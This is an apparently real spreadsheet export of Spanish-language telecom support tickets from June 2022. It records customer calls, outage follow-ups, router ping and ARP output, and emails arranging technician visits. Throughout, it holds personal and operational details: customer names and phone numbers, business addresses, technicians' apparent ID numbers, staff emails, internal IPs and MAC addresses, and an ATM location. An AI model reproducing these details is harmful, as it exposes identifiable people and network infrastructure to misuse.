*JUN 10 11:11:41.794 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:13:16.881 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:17:02.471 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:17:47.983 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:18:39.118 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:19:09.574 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:19:40.178 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:20:10.801 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:20:55.729 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:21:45.896 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:23:02.172 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:31:09.179 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:31:41.943 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:34:22.557 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:43:18.188 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:47:31.757 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 10 11:47:32.769 GMT: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:47:33.769 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:47:39.957 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 10 11:47:40.969 GMT: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:47:41.969 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 12:18:20.743 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
ID1341001#    SH CLOCK
*12:26:20.878 GMT FRI JUN 10 2022</t>
  </si>
  <si>
    <t>F4595939</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA DANIELA NAJARRO-22685616  CLIENTE INDICA QUE TUVO  UN MOENTO EN DONDE SE LE CAYO EL SERVICIO ##PERO YA TODO OK ## INDICA QUE POR LA ZONA HAN HABIDO APAGONES, POSIBLEMENTE EN ALGUN MOMENTO HUBO HOY UNN APAGON ##CLIENTE VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4595942</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELY SEQUEIRA 77006732 MENCIONA QUE EL SERVICIO ES INTERMITENTE E INESTABLE POR LO QUE SOLICITA UNA VISITA TECNICA
-ID 2001308169
NOMBRE DEL CLIENTE: INGENIO LA MAGDALENA,S.A
UBICACIÓN:KILOMETRO 8.5 CARRETERA EL COCO CANTON LA MAGDALENA SALCHUAPA SANTA ANA
CONTACTO EN SITIO: JAIRO MONTERROSA
HORARIO DE ATENCION: 8:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4595943</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 56919063 MENCIONA QUE NO PUEDE APOYAR CON PRUEBAS EN ESTE MOMENTO
-ID 2001314850</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ESDRAS VÁSQUEZ/CENTRAL, SE LE INDICA QUE SE HABLARÁ CON PR; SE TIENE EN LÍNEA A MIGUEL GÓMEZ/PR 56919063, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA PERLA ESTRADA/GESTOR N1; EN TRIPARTITA, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4595946</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS ACEVEDO 22335008 MENCIONA QUE PRESENTA PROBLEMA CON EL ANCHO DE BANDA
-ID 2001365429
NOMBRE DEL CLIENTE: LEMUSIMUN PUBLICIDAD S.A.
UBICACIÓN:CALLE APANECA #4C RESIDENCIAL ARCO DE SANTA ELENA ANTIGUO CUSCATLAN
CONTACTO EN SITIO: CARLOS ACEVEDO 22335008
HORARIO DE ATENCION:8:30 - 12:30 Y 14:00 - 18:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ACEVEDO 71705548 COMENTA QUE TECNICO VALIDO SERVICIO EN EL SITIO, COMENTA QUE YA QUEDO RESUELTO Y VALIDA SERVICIO OPERATIVO
2001534143
COLA:
NOMBRE: A: 0050371705548
NÚMERO: 0050371705548
DURACIÓN: 0:02:18
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050371705548
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 10/06/2022 17:28:09</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS ACEVEDO AL 22335008  INDICA QUE TIENE POR EL MOMENTO LA SUBIDA EN 11 Y DE AHI NO HA PASADO || SE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
-ID 2001293913
**</t>
  </si>
  <si>
    <t>F4595954</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RAMIRO LEAL AL 56216942 QUIEN INDICA QUE HOY CIERRAN A LAS 17:00 HRS PERO BRINDA LA SIGUIENTE INFORMACION Y SOLICITA QUE SE LE LLAME ANTES QUE EL PERSONAL TEC LLEGUE CON 1 HR DE ANTICIPACION **
NOMBRE DEL CLIENTE: ZENHTEX S.A.
HORARIO DE ATENCION: 8:00 A 17:00
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: PARCELA 24 SECTOR LAS NUBES FINCA BARCENAS JURISDICCION MUNICIPAL DE VILLA NUEVA
ATENDERA EN SITIO: RAMIRO LEAL
-ID 2001299391
**</t>
  </si>
  <si>
    <t>REPORTA INESTABILIDAD
SOLUCION: ENLACE SE ENCUENTRA OPERATIVO Y ESTABLE, SE VALIDA INESTABILIDAD DEBIDO A SATURACION PRESENTADO POR CLIENTE, SE ENVIA CORREO CON GRAFICA DONDE SE VALIDA LA SATURACION.--- VALIDAR MEDIANTE SD-</t>
  </si>
  <si>
    <t>SE ESTÁ VALIDANDO CRONO MÁS RECIENTE EN FALLA CON GESTIÓN N1 VÍA SKYPE, SE CONSULTA SI COORDINARÁN VISITA TÉCNICA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAMIRO LEAL AL 56216942 INDICA QUE ESTA MUY INESTABLE YA QUE ESTA REALIZANDO  PING EXTENDIDO Y CADA 20 O 30 SEGUNDOS SE CAE || SE NOTIFICA A GESTOR **
ID 2001297395
**</t>
  </si>
  <si>
    <t>F4595962</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO HERRERA 70739113 PARA SOLICITAR DATOS VISITA
-ID 2001421796
NOMBRE DEL CLIENTE: INSTITUTO SALVADOREÑO DE TRANSFORMACION AGRARIA	
UBICACIÓN: KILOMETRO 30.5 CARRETERA A SAN JUAN OPICO SITIO DEL NIÑO LA LIBERTAD (EL CUBO DE LA JUVENTUD)
CONTACTO EN SITIO: ALVARO HERRERA 70739113
HORARIO DE ATENCION:7:30 - 15:30
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS
*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A ALVARO HERRERA  70739113 INFORMA QUE REINICIARON EQUIPOS PERO QUE NO LES DA  LINK  SOLICITA VISITA Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 7:30 A 15:30 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: KM 30.5 CARRETERA A SAN JUAN OPICO SITIO DEL NIÑO MUNICIO DE  SAN JUAN OPICO PUNTO DE REFER. EL CUBO DE LA JUVENTUD.
ATENDERA EN SITIO: ALVARO HERRERA
-ID 2001301323
**</t>
  </si>
  <si>
    <t>F4595974</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARMANDO GONZALEZ 86279354 INFORMA QUE TUVIERON UN PROBLEMA INTERNO EN SU LAN YA LO SOLVENTARON, SE PROCEDE AL CIERRE DEL INCIDENTE.
DESDE LA CENTRAL CON CONEXION AL PR
MINGOB_PRINCIPAL_DATOS_CM#PING 192.168.35.1 SOURCE GIGABITETHERNET 0/1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.35.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 10.15.105.233
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 4/5/8 MS
MINGOB_EL_ESPINO#PING 10.15.105.233 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.15.105.233, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.35.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 4/4/8 MS</t>
  </si>
  <si>
    <t>F4595983</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B ATIENDE MOISES, COMENTA QUE AUN NO HAN ENVIADO A SUPERVISOR, PROCEDE A COORDINAR, SOLICITA SE LLAME DENTRO DE DOS HORAS.
3001607761
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:04:08
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 16/06/2022 14:34:22
REVISION</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA QUE COORDINE VISITA CON APOYO DEL ADMINISTRADOR  SE QUEDARA AL PENDIENTE
MONITOREOFALLASATM@5B.COM.GT; SERVICIOS5B@5B.COM.GT
ESTIMADO CLIENTE,
LE COMENTAMOS TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM67 SE OBSERVA ENLACE PRINCIPAL CAÍDO, ACTUALMENTE EL CAJERO SE ENCUENTRA OPERANDO MEDIANTE EL ENLACE REDUNDANTE, POR LO QUE SOLICITAMOS SE PUEDA ENVIAR AL PERSONAL AL SITIO A REINICIAR LOS EQUIPOS DE ÚLTIMA MILLA
TICKET: F4595983
ID: 806300191T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM67
UBICADO EN: (ATM 067) BANCO DEL AGRO CALLE PRINCIPAL COME - ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 5B CONTESTA HECTOR COMENTA QUE AUN NO TIENE REPORTE DE QUE EL SUPERVISOR HAYA IDO A PUNTO REMOTO A VALIDAR ATM, COMENTA QUE LO ENVIARAN EL DIA DE MANAÑA, SOLICITA SE LLAME A LAS 10 AM PARA SOLICITAR AVANCES.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:53
FIN: HOY, 18:55
DURACIÓN: 1:56
ID DE LLAMADA: 3001222007</t>
  </si>
  <si>
    <t>F4596013</t>
  </si>
  <si>
    <t>**SE LLAMAA A CLIENTE CARLOS HERNANDEZ AL  23386328  CONTESTA LA SEÑORA NORMA DE GARCIA INDICA QUE NO HA INGRESADO QUE SE LE LLAME DESPUES DE LAS 8:00 AM **
ID 2001342400
**</t>
  </si>
  <si>
    <t>F4596016</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE CARLOS JIMENEZ 23435000, ID: 2001367591, SE ESTÁN HACIENDO PRUEBAS DE TRAZAS, APOYA GUADALUPE</t>
  </si>
  <si>
    <t>F4596031</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE SONIA Y TECNICO DE IT INTERNO LUIS , SOLICITA APOYO PARA PRUEBA CONECTANDOSE DIRECTEMENTE AL ROUTER DE CLARO EN 20 MINUTOS</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE SONIA, INDICA QUE EL SERVICIO LO ESTARAN REVISANDO TECNICOS DE IT INTERNO Y AUTORIZA CIERRE DE TICKET.
2001399061
COLA:
NOMBRE: A: 55173611
NÚMERO: 55173611
DURACIÓN: 0:03:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55173611
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 10/06/2022 10:17:33</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA RAMOS 55173611 MENCIONA QUE PERSISTE EL INCONVENIENTE, CLIENTE MENCIONA QUE TIENEN PROBLEMA CON EL SERVICIO DE FO
-ID 2001354256</t>
  </si>
  <si>
    <t>F4596044</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JORGE MARIO FUENTES  ...</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE SR. JORGE MARIO  REALIZO CAMBIO DE PATCHCORD Y APLICO REINICIO A SU SW LINKSYS CONFIRMA ENLACE OPERATIVO Y ESTABLE, SE PROCEDE AL CIERRE.
CC_INDUSTRIAS_PLASTICAS_GT_INTERNET_VILLA_NUEVA#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.170.1            0   B443.2600.CAAD  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.174.170.11           5   00A0.266C.D4E5  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.174.170.19           -   7061.7B0F.9280  ARPA   GIGABITETHERNET0/0/0
INTERNET  186.151.15.161          -   7061.7B0F.92F4  ARPA   VLAN1
INTERNET  192.168.0.1             -   7061.7B0F.92F4  ARPA   VLAN1
INTERNET  192.168.0.100           3   782B.CBA1.FEDA  ARPA   VLAN1
INTERNET  192.168.0.104           0   CE60.909E.42DA  ARPA   VLAN1
INTERNET  192.168.0.110           0   98DF.82B1.DFF2  ARPA   VLAN1
INTERNET  192.168.0.117           1   9890.96B4.99D4  ARPA   VLAN1
INTERNET  192.168.0.125           1   6C62.6DDD.4058  ARPA   VLAN1
INTERNET  192.168.0.128           1   809F.F5AC.CE1E  ARPA   VLAN1
INTERNET  192.168.0.129           2   0013.8F20.5EBE  ARPA   VLAN1
INTERNET  192.168.0.130           0   2811.A85A.91C3  ARPA   VLAN1
INTERNET  192.168.0.131           5   B83B.CC66.F132  ARPA   VLAN1
INTERNET  192.168.0.140           0   C8D7.B051.6A0C  ARPA   VLAN1
INTERNET  192.168.0.145           0   1A99.67C3.CD2F  ARPA   VLAN1
CC_INDUSTRIAS_PLASTICAS_GT_INTERNET_VILLA_NUEVA#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/857000001T/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        ADMIN DOWN     DOWN
GI0/1/1                        UP             UP
GI0/1/2                        DOWN           DOWN
GI0/1/3                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_INDUSTRIAS_PLASTICAS_GT_INTERNET_VILLA_NUEVA#PING 8.8.8.8 SOURCE VLAN 1 RE 3000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 3000, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 186.151.15.161
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (3000/3000), ROUND-TRIP MIN/AVG/MAX = 28/28/40 MS</t>
  </si>
  <si>
    <t>F4596045</t>
  </si>
  <si>
    <t>MYNOR MENDEZ -55777498 -- SE TIENE EN LINEA ##  INDNICA QUE Y YA SE SOLVENTO ## APLICO REINICO A PBX Y SERVICIO RESTABLECIO + INDICA QUE APLICARON RESET TAMBIEN A E1, PERO SE LE COMENTA QUE NO- QUE EN NUESSTROS LOGS NO APARECE QUE SE HAYA REINICIADO ## SE ASPOCIA  A PBX ### PBX INHIBIDA
DISTRIBUIDORA_SAGITARIO_90001902972\SYSTEM&gt;DATE
DATE WEDNESDAY 15 DECEMBER 1971 TIME 07:31:44
COMMAND EXECUTED
DISTRIBUIDORA_SAGITARIO_90001902972\SYSTEM&gt;DATE SHOW STATUS -S
WRONG ARGUMENT
DISTRIBUIDORA_SAGITARIO_90001902972\SYSTEM&gt;SHOW STATUS -S
SYSTEM IS RUNNING SINCE: 11/12/1971 06:19:34
DELAYED RESTART: NOT SCHEDULED
PCB TEMP:     +39.0 C
CPU TEMP:     +61.6 C
FAN1 SPEED:     0 RPM
FAN2 SPEED:  4360 RPM
DAYLIGHT SAVING TIME IS NOT ACTIVE.
COMMAND EXECUTED
DISTRIBUIDORA_SAGITARIO_90001902972\SYSTEM&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE EVERTO VASQUEZ-53463662 3 VECES ##ENVIA ABUZON
##VIVO
EVERTO VASQUEZ-53463662</t>
  </si>
  <si>
    <t>F4596049</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MERCEDES HERNÁNDEZ 87403744 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001475147
**</t>
  </si>
  <si>
    <t>F4596056</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 22070800 EXT 0000 NO RESPONDE || SE INTENTARA LUEGO YA QUE AUN NO RESPONDE CORREO CON INFORMACION**
ID 2001341709
**</t>
  </si>
  <si>
    <t>|| SE ENVIO DATOS A CLIENTE DE PERSONAL || PENDIENTE QUE CONFIRMEN HORA Y FECHA PARA RECUPERACIÓN DE GESTION DE EQUIPO
ASUNTO: RECUPERACIÓN GESTION SERVICIO ID 288700011T || CENTRAL AMERICANA DE DISTRIBUICION S.A.
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS CENTRAL AMERICANA DE DISTRIBUCIÓN.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 288700011T || UBICADO EN COLONIA SANTA TERESA CASA NO 5 ZONA 5 RETALHULEU.
LE COMPARTO INFORMACIÓN DEL POSIBLE PERSONAL TÉCNICO ASIGNADO PARA APOYO EN RECUPERAR GESTIÓN DEL EQUIPO, SOLICITAMOS NOS PUEDAN AYUDAR EN GESTIONAR ACCESOS PARA ELLOS, ASÍ COMO BRINDARNOS LA FECHA Y HORA PARA PROCEDER.
JULIAN LOPEZ, JOSE DANILO 610004 2082737511106 58260227
DONIS LÓPEZ, GERBER JOSUÉ 550149 2086696631101 58263066
QUEDAMOS ATENTOS A SU CONFIRMACIÓN.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>NO SE CUENTA  CON RESPUESTA DE PARTE DE CLIENTE</t>
  </si>
  <si>
    <t>SE  REENVIA CORREO A CLIENE
RECUPERACIÓN GESTION SERVICIO ID 288700011T || CENTRAL AMERICANA DE DISTRIBUICION S.A.
JONATHAN EDUARDO TEZEN MEJIA
BUEN DIA  ESTIMADO CLIENTE,
ES UN GUSTO PODER SALUDARLE , LE REENVIO DATOS DE NUETRA AREA TECNICA
SOLICITAMOS NOS PUEDAN AYUDAR EN GESTIONAR ACCESOS PARA ELLOS, ASÍ COMO BRINDARNOS LA FECHA Y HORA PARA PROCEDER.
JULIAN LOPEZ, JOSE DANILO 610004 2082737511106 58260227
DONIS LÓPEZ, GERBER JOSUÉ 550149 2086696631101 58263066
QUEDO ATENTO A SUS COMENTARIOS</t>
  </si>
  <si>
    <t>--- SE LLAMA A CARLOS GODINEZ 42474587 (CLIENTE), AUN NO SE TIENE RESPUESTA, SE INTENTARA EN UN MOMENTO. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 42474587
NÚMERO: 42474587
INICIO: HOY, 13:59
FIN: HOY, 13:59
DURACIÓN: 0:35
ID DE LLAMADA: 2001642526
...</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 16:50
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CARLOS EDUARDO GODINEZ GONZALEZ &lt;CARLOS.GODINEZ@SOPESATOTAL.COM&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: RECUPERACIÓN GESTION SERVICIO ID 288700011T || CENTRAL AMERICANA DE DISTRIBUICION S.A.
*-*-*-*</t>
  </si>
  <si>
